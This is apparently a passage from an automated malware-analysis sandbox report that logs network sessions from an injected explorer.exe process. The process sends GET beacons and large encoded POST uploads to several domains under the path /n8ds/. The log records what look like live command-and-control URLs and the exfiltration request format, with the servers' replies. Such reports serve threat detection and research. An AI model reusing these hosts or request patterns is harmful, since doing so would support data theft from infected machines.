70 66 38 71 46 32 69 74 4e 47 37 77 47 53 6c 72 57 39 72 6d 62 4d 34 4c 30 4b 61 49 4f 70 30 56 66 2d 71 71 74 4d 51 64 56 2d 62 33 4c 76 4c 4b 39 58 5a 43 46 36 34 33 54 69 6b 6e 79 48 42 71 31 50 4d 74 74 38 55 50 42 71 4d 57 58 79 67 33 75 47 78 76 65 6d 49 6d 37 6b 6e 4f 45 6f 62 54 39 69 65 4c 49 4c 6d 45 7a 37 42 59 7e 57 75 66 55 71 58 43 4b 4b 5a 55 58 70 67 64 61 72 4d 34 67 69 4d 35 41 37 71 45 53 70 59 65 44 35 71 75 72 78 73 54 69 45 55 4d 4b 32 58 44 33 51 35 75 4e 4c 4e 6e 37 71 59 2d 45 78 59 52 53 41 66 6c 67 46 75 6c 44 51 69 59 49 4e 30 67 63 32 28 62 31 48 73 45 4a 49 43 53 6b 64 31 50 6e 47 33 54 74 52 69 6b 69 56 71 69 63 37 6f 6e 4a 76 34 34 33 4e 78 77 45 67 65 75 36 43 6a 62 4e 41 7a 62 34 36 46 4a 32 31 32 55 58 74 65 2d 4c 6b 4a 59 43 30 7e 30 7e 41 31 6a 68 6f 4f 64 30 76 75 36 42 64 43 69 6e 6b 36 44 6f 6c 52 57 61 48 77 4a 37 67 48 79 4e 41 46 38 66 47 65 67 63 58 47 4b 78 34 53 50 4a 5a 4b 59 68 38 6e 75 4a 6a 28 76 64 78 52 30 73 4a 46 71 4e 79 6f 77 78 49 31 55 4c 61 52 61 33 51 31 74
                                                                                                                                                    Data Ascii: lZOD=1jYnuna3fjhjhYEsgw4rhGm1U30BWXsAVaYLNOKi(Zk4uPO3GOyS3qQGpEtxZdzsUNraIED93Ydtm7EatGXtXHBRMFehGIk74MawIGsOu8BJRJJ-rKZuGfGItFT2nwy50Am8~HMy5CkXuOblCnD7iip_Q0wHMDiki19hzIr0bjl7Q57HoDmaarwEjrp8j4IWokR2zZgNkg8rUIFCoyWDU6LN78b8~pJiPqWn1c8JSB8hPBtt7OB68AWWyOSxTpVLMSX7IFRmkQEAsTkHCx6MKlmNLthJ3KoEMRgUeFuBMJ1pB6vDOtshiczW~1nI3Gp-ouNGUjMpPJpBxrLkCMSnCdte9P~kSjVRwEcz4fOropYkxbNsFCtXGZqhAOZ24CWJ6PSpF1i9v7NrhLt_cpGKSmj1i6wVyqpdrehtZRDURKcEfpV6oiPQkY7-e-Mwh65KfKJ_hWXakTJmEtT25pfSWVcQmuFQuzaQ2uVDoggsWOBqAkUkP0l6ps3tmVNL4_dvfFeM8ZSTPRt_0E5tUwv0vEr6xJ~lB-xzmBO1ibJSMF2Ew8kIjMJtk-9Xe8u0RhUkTp3BgM6yw3SUW6A5RlqfG7hAVgCYSRK17Mz5bhPbrbNnpOJyaTIVlrhAVTfwiN7I(rRg~TGvADu4TV1zKG8wsM3ouxwFMQhlI3IfyOUTc_JEUIxviM(iT1b-ILGl9DBIvIpEB0gX1BbEOjFOvVTN438Yz_~dRt8jgN1n2bozn8CAyhsNC8CITqpnq39zRepp1joqq66tg5IR0jZNLpOWPAqHez~gLh157plX5zKhTSUeh6eIir(1CCNz8k74PIFemZFBVPTmspxslguJuYI45b8lC6ctwHTmMCa2HeEJpSswZvSm8ZL9dNBcmjxiN9m2onvNbSOeTdaiFy6MIauC(Fd5x_GgABa8689YPWfJXIwVJt9YsEOyZPkcqI6as4cCy2vocjloORodTzS8ao6EgLkpphWo6-YDhBRiuStU7z4KxMJaw5MNVkpf8qF2itNG7wGSlrW9rmbM4L0KaIOp0Vf-qqtMQdV-b3LvLK9XZCF643TiknyHBq1PMtt8UPBqMWXyg3uGxvemIm7knOEobT9ieLILmEz7BY~WufUqXCKKZUXpgdarM4giM5A7qESpYeD5qurxsTiEUMK2XD3Q5uNLNn7qY-ExYRSAflgFulDQiYIN0gc2(b1HsEJICSkd1PnG3TtRikiVqic7onJv443NxwEgeu6CjbNAzb46FJ212UXte-LkJYC0~0~A1jhoOd0vu6BdCink6DolRWaHwJ7gHyNAF8fGegcXGKx4SPJZKYh8nuJj(vdxR0sJFqNyowxI1ULaRa3Q1tsM4L7H4MUP8sdV2HvSs29jJEXZvLPRik6hrx~G688PinhyIIPfd4bTfZjVVKFl~7r8k5tjjBxmMGH0zKIbfEdd4JGz2HwvDgJIN9Cvt3Rc6OKkmn99OWaUyrMs1bvfstdX5J1AHss60FkQ1FeZqLOdql5TouealWWwOiKSm6UudvVMlwX2a8kzlLvF6LS0fMWicB060rlm~zCMlOkGmupdCo7bdx776lJQlOtTm65TUbMPirWrEH50nFIvFpw6GxpTpXqPE5GXsWLl3-vpU1TSwQEIYfnaqrYgdgdj~urQuz11ocP7YlyBO0g2eOZpIKQaRdgvmhfq0Ya-GU~OpmFTVAYbGHHerqQsR_8R3ihcS1~HwNSVFmO_1D7tr-lGEye7V6asyTUuR89Yzr224Z8WPjn7k02QbyT36F7mZNpOnONMgRGj9YLjSpcl(oiDWpEYHWsehdcBQ6dnLPGOnSzZ33u1nbjAC9ahx0iy5UUD4fbPiwFPebU4MoNEhQhIclMLP6SPdV0C08rpltinalC36KQrmvZ4Y84CP7G6Hzo6zcI9EtWzmL2hgZKyqiaa4q8kMfYjl5o3V7aLTCmQK9~7aBXFGVzaLdc_pTf_l-peijF_9wpKeIg8KOrB4XrLKQplAg(sHBGGvoHvMPOf3Mjy7j3qBjYGeQvD6vJJg6RCGuKDj8L8a5mgd8lJNmvIgPy7WzJNbOl5JPjJpWX-FOpBUM1cGofZzSlR5jr9EfjRf0jyS-~yBr56MNr1HnhohzKXy4KvAmuwkZ3x(9Zl9h5SH6ti8gHAICMl81HomfAT49(CIgB4u6kqZrKJurnt39l9uDvmCX6thh0Br8~DdNOAPGZ2K4K7t9rUp5EH0BV8R3StxOEdzDLoapnFPMJK1cSM8fAum3~_gex
                                                                                                                                                    Nov 29, 2021 14:11:47.234293938 CET8074OUTData Raw: 54 4c 4b 53 6a 68 6b 42 51 76 34 48 42 50 7a 4b 35 55 45 46 76 78 72 4b 4c 35 30 6b 64 56 39 52 38 68 6f 33 70 36 69 79 48 56 43 37 7a 28 75 54 66 78 45 75 78 73 6d 37 6a 35 58 7e 30 69 78 53 6d 68 59 73 59 4c 6a 51 35 53 46 38 6e 6b 37 55 5f 5a
                                                                                                                                                    Data Ascii: TLKSjhkBQv4HBPzK5UEFvxrKL50kdV9R8ho3p6iyHVC7z(uTfxEuxsm7j5X~0ixSmhYsYLjQ5SF8nk7U_ZoVWji15iU(IUvP89l6PaQRiH77EQfGZ9jSdLHrGZcrLmwCCSnxrvstX2xt8NrxEBm316iuI9BOy8YOOpotQKY3X6IVUYI6Q5hsm9IbJhGsLCYF4WgOR(lyU4CS-~67_nInmk8ZKUAHozufxRUJtklYTiTvPwfV0Ga
                                                                                                                                                    Nov 29, 2021 14:11:47.234338045 CET8075OUTData Raw: 45 65 4f 58 77 4f 5a 48 4a 38 50 66 63 79 57 50 59 4d 6e 6b 71 64 4c 28 42 4b 56 66 5a 41 4b 4a 36 4f 6e 32 34 78 37 73 61 33 35 30 74 76 76 6c 44 66 67 59 64 28 5a 76 5a 53 49 74 4c 49 76 46 62 6d 34 65 63 6a 63 51 48 5a 2d 4a 62 75 77 31 78 44
                                                                                                                                                    Data Ascii: EeOXwOZHJ8PfcyWPYMnkqdL(BKVfZAKJ6On24x7sa350tvvlDfgYd(ZvZSItLIvFbm4ecjcQHZ-Jbuw1xD1(fHBTNOjwLdTZtvWbtwtBaLeEOtK0Mjx(pEoOJbBwITH5ttpuAdVOqoI95Jz~4lukEy_5et5n3crXqmPVSOxAI5775x6oAJ5D7ag3TPq9jPQl-YSyx9MPq6GZ8epy6QWCmvqezwuwxxQAhzGHLYdctxRPAAtI3j1
                                                                                                                                                    Nov 29, 2021 14:11:47.245651960 CET8078OUTData Raw: 58 77 75 76 58 57 57 36 50 6a 48 79 79 6b 30 33 61 74 62 55 36 49 79 41 6d 6e 4b 57 6d 6d 6b 56 52 62 67 56 4f 59 4f 67 4f 6b 67 59 34 64 52 62 68 37 79 74 54 28 2d 36 32 6c 48 4d 75 68 57 4f 34 7a 58 48 43 6a 41 69 41 32 45 67 65 69 5f 72 70 71
                                                                                                                                                    Data Ascii: XwuvXWW6PjHyyk03atbU6IyAmnKWmmkVRbgVOYOgOkgY4dRbh7ytT(-62lHMuhWO4zXHCjAiA2Egei_rpq166ufxE3Gc4Kek7lpGcWa40NL5-Knvnk2kIuUDLQsL5hg93fP2h(CZ7aCEAm_ME3uOP2s7HF_WGJZBmhUA4QNVdxHfSvHjRfdAgwGBVm_RL6sNtY1y5orHQ0R21ezdjz3CjWu5ZiWsHX-4sNnUOtbs2tQntRbgD7z
                                                                                                                                                    Nov 29, 2021 14:11:47.245867968 CET8083OUTData Raw: 37 33 75 54 65 4d 30 45 65 4e 31 6b 31 71 66 56 2d 7e 56 43 53 28 55 54 66 4d 53 43 6f 33 58 37 64 36 63 46 66 59 42 33 62 4e 32 56 36 6a 78 70 77 6c 6c 41 66 6e 64 4b 58 70 53 6c 75 36 68 49 4e 47 57 64 68 46 47 5a 57 50 6f 32 57 66 59 6a 37 41
                                                                                                                                                    Data Ascii: 73uTeM0EeN1k1qfV-~VCS(UTfMSCo3X7d6cFfYB3bN2V6jxpwllAfndKXpSlu6hINGWdhFGZWPo2WfYj7ABIjnz7L~f0s8YjQSCeBodyyKMpdrkzHS41etuoD7SvihIQFpFaq1cEaFROofIOTPqmh1quDkG(jOvJpj-b4zRzTlg9_b32I5dfnaiYjUwDpmmFfGlc4UYwdVYuSLXLCPS(gZhGcxQpTSFfeyR4Q4PVVUx5IrVZzT_
                                                                                                                                                    Nov 29, 2021 14:11:47.246045113 CET8089OUTData Raw: 55 56 53 49 62 6c 56 78 34 7e 30 75 61 4a 6a 4b 65 51 6b 52 65 36 5a 50 6a 65 4b 6a 7a 4b 55 6e 76 53 76 71 41 28 7a 71 6d 39 34 54 58 49 4c 6d 4b 48 75 6a 6a 43 78 62 6a 37 45 28 37 70 76 74 36 7e 65 76 72 68 5f 58 67 78 4b 69 70 75 44 46 49 50
                                                                                                                                                    Data Ascii: UVSIblVx4~0uaJjKeQkRe6ZPjeKjzKUnvSvqA(zqm94TXILmKHujjCxbj7E(7pvt6~evrh_XgxKipuDFIP4XI5m2KxHhvoAkC6O0fqWbyskxVzoYiknUfNxWPLEuSyfXG3zWeCKaOEkOUQpNX4HreqvUMtw3CEfOToekEXc(OWOSeu9dv7Jz33432CLft8x3sTE21cM0q8g~AOWAkMLONWgkVcJzeHiMs7dEpfQJTWWZwymDKiH
                                                                                                                                                    Nov 29, 2021 14:11:47.246192932 CET8092OUTData Raw: 4f 46 67 66 6c 50 67 63 34 57 5a 4b 74 34 36 6d 4b 7a 44 30 6b 58 51 47 7a 46 49 64 56 78 62 75 39 58 69 68 72 32 56 6b 6d 6c 72 7a 55 37 62 57 32 6f 56 4e 4c 75 58 56 46 36 62 75 34 48 78 44 54 55 67 4c 63 6a 58 37 45 43 36 43 6d 56 65 42 7a 74
                                                                                                                                                    Data Ascii: OFgflPgc4WZKt46mKzD0kXQGzFIdVxbu9Xihr2VkmlrzU7bW2oVNLuXVF6bu4HxDTUgLcjX7EC6CmVeBztMVmZLlOnYAFMvojMQVItAFms3yHVpYw5LPkOhGlFDHEyyQ2lszXhKsIswI_cu~KCxJgIfW7Qln7MxjPQwI9OwumkoHb0UTkXABFdHpUKKfaxHFNlAExbKZsJTQd~WBq0j91m1MlM0CGOanOmBUL6KMmpUVKLZp-6q
                                                                                                                                                    Nov 29, 2021 14:11:47.246375084 CET8099OUTData Raw: 79 34 5a 4b 42 62 39 4d 31 73 41 48 33 39 4e 38 4d 62 45 6b 38 7a 70 68 55 62 69 28 46 70 49 69 4f 36 67 34 63 45 4f 66 4a 28 37 51 53 36 79 35 53 48 4c 66 31 37 61 45 59 6b 70 45 49 68 70 57 64 64 34 46 38 70 58 4a 4a 55 5f 6e 48 7e 73 28 61 55
                                                                                                                                                    Data Ascii: y4ZKBb9M1sAH39N8MbEk8zphUbi(FpIiO6g4cEOfJ(7QS6y5SHLf17aEYkpEIhpWdd4F8pXJJU_nH~s(aUQ2v1t4YE4PI7B330GGuIELUj1CSEBpx103dajHt9UFbWTvKMHEdQvm-z5iCpoxDs6W-4pM9C56eIXF_jbVPYfV5US0hL5Xlifv-uInRTj(w(nV0fN56uLoIugJbrdUAKyMIbxh6ob(YVyr1bqnDSlqiuaPhamgoTs
                                                                                                                                                    Nov 29, 2021 14:11:47.246418953 CET8101OUTData Raw: 31 33 61 4e 61 76 47 73 55 6b 70 74 42 53 7a 4e 71 33 4a 77 44 58 77 74 55 72 75 46 58 7a 4e 50 53 61 70 47 30 4f 77 36 69 59 67 74 63 6b 73 51 74 75 57 33 4e 63 5a 44 4a 30 45 67 33 70 68 76 4c 52 55 72 7a 56 53 68 55 66 71 70 43 67 42 4d 65 48
                                                                                                                                                    Data Ascii: 13aNavGsUkptBSzNq3JwDXwtUruFXzNPSapG0Ow6iYgtcksQtuW3NcZDJ0Eg3phvLRUrzVShUfqpCgBMeHbOC135l0cePHV6guzX4HHQpoQGFidOyI737cJF77GUko5hILGJ_UoqXF1ao5SYD0iGLr72tQqLfm5NcuvrlpjKv4xBhQdnpATz-1-tn(vr6dX(Rsa8P22GsDj6HpOlEOqWMorSBkwOdGxGCLcdEbKKhS1n74Bw_lY
                                                                                                                                                    Nov 29, 2021 14:11:47.257143021 CET8102OUTData Raw: 45 61 63 64 7a 58 74 6b 6e 51 79 4b 48 4e 67 62 6c 58 78 52 4d 41 42 64 42 6d 69 4e 74 59 34 36 71 61 45 4d 65 47 2d 42 4e 6e 45 47 78 78 71 4d 70 59 52 58 42 79 5f 70 42 48 30 68 41 69 32 66 77 53 33 56 38 46 76 4c 55 55 33 39 77 70 39 71 76 44
                                                                                                                                                    Data Ascii: EacdzXtknQyKHNgblXxRMABdBmiNtY46qaEMeG-BNnEGxxqMpYRXBy_pBH0hAi2fwS3V8FvLUU39wp9qvDwhAaASfKGKkbq8Jjvct4xxDnrGtR5tdqAwIWyXpzdU-ElasdkIoW_yUSH79gfZEF9lcsyTdTGbU4SEprfdZAwGYFTRbkmo7lbQB0f2q~pRgpQKfvemBoXpBBwnHx7cjZxnxRdCCTg4QmHpHzdrkrH3tMfA_zysetR
                                                                                                                                                    Nov 29, 2021 14:11:47.257419109 CET8105OUTData Raw: 42 77 56 41 64 31 34 78 54 5a 58 28 55 43 6a 68 36 51 32 6d 2d 62 35 5a 30 49 43 63 4b 6f 39 28 52 59 72 6e 4a 28 45 70 32 51 49 72 42 7a 39 32 59 47 55 53 7a 61 77 6d 5f 49 30 56 63 50 31 7a 47 57 48 58 46 55 6e 6e 69 32 63 35 4d 6b 73 66 38 50
                                                                                                                                                    Data Ascii: BwVAd14xTZX(UCjh6Q2m-b5Z0ICcKo9(RYrnJ(Ep2QIrBz92YGUSzawm_I0VcP1zGWHXFUnni2c5Mksf8P6D_ykNXQsZr14BEN40OUxNgm6qL~Mes92iPgjWdxc6Zddnga_qLI-XCaSQBRgcCvwviUXq8vkgxJPfvc0tZWBcZsFSptgEGm46fKhHQ(mtkwOG_7TQtgwx8ynFBQa2uD_bHVIGEvky-UjpBLHZuzypVDNhSd9mZx4
                                                                                                                                                    Nov 29, 2021 14:11:47.404886007 CET8199INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:47 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 154
                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_DoZgPSk10aaiHf3kie/1tYxoMNLDLxmpbn0+w5n3KsKZrXQPAWaITkbhtz7G0bj3OzLqNxbyMokA2LYq0WCz7A
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    41192.168.11.204985534.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:47.246383905 CET8100OUTGET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:11:47.354579926 CET8198INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:47 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "6192576c-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    42192.168.11.2049856192.0.78.2580C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:12:09.711518049 CET8201OUTGET /n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1
                                                                                                                                                    Host: www.divorcefearfreedom.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:12:09.865227938 CET8201INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:12:09 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 162
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.divorcefearfreedom.com/n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9
                                                                                                                                                    X-ac: 2.hhn _dca
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    43192.168.11.204985738.143.25.23280C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:12:15.069869041 CET8202OUTGET /n8ds/?lZOD=YRa5YekRSAscu3KREIVoiFdBwJD7Q6+kwilTnNtYZuu2w/klC7MTP9008fix5v3TRxpN&B85P=7nvHaF HTTP/1.1
                                                                                                                                                    Host: www.reliablehomesellers.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:12:15.239454985 CET8203INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:12:15 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 162
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.reliablehomesellers.com/n8ds/?lZOD=YRa5YekRSAscu3KREIVoiFdBwJD7Q6+kwilTnNtYZuu2w/klC7MTP9008fix5v3TRxpN&B85P=7nvHaF
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    44192.168.11.2049859185.61.153.9780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:12:30.467041016 CET8211OUTGET /n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1
                                                                                                                                                    Host: www.dif-directory.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:12:30.495929003 CET8212INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/html
                                                                                                                                                    content-length: 707
                                                                                                                                                    date: Mon, 29 Nov 2021 13:12:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    location: https://www.dif-directory.xyz/n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
